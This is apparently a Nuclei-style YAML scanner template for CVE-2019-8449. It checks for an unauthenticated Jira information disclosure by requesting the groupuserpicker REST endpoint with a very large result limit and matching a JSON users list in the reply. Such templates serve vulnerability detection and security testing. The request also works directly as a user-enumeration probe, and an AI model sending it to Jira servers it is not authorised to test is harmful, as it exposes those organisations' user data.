23 lines
521 B
YAML
23 lines
521 B
YAML
id: CVE-2019-8449
|
|
|
|
info:
|
|
name: JIRA Unauthenticated Sensitive Information Disclosure
|
|
author: Harsh Bothra
|
|
severity: medium
|
|
|
|
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '{"users":{"users":'
|
|
part: body
|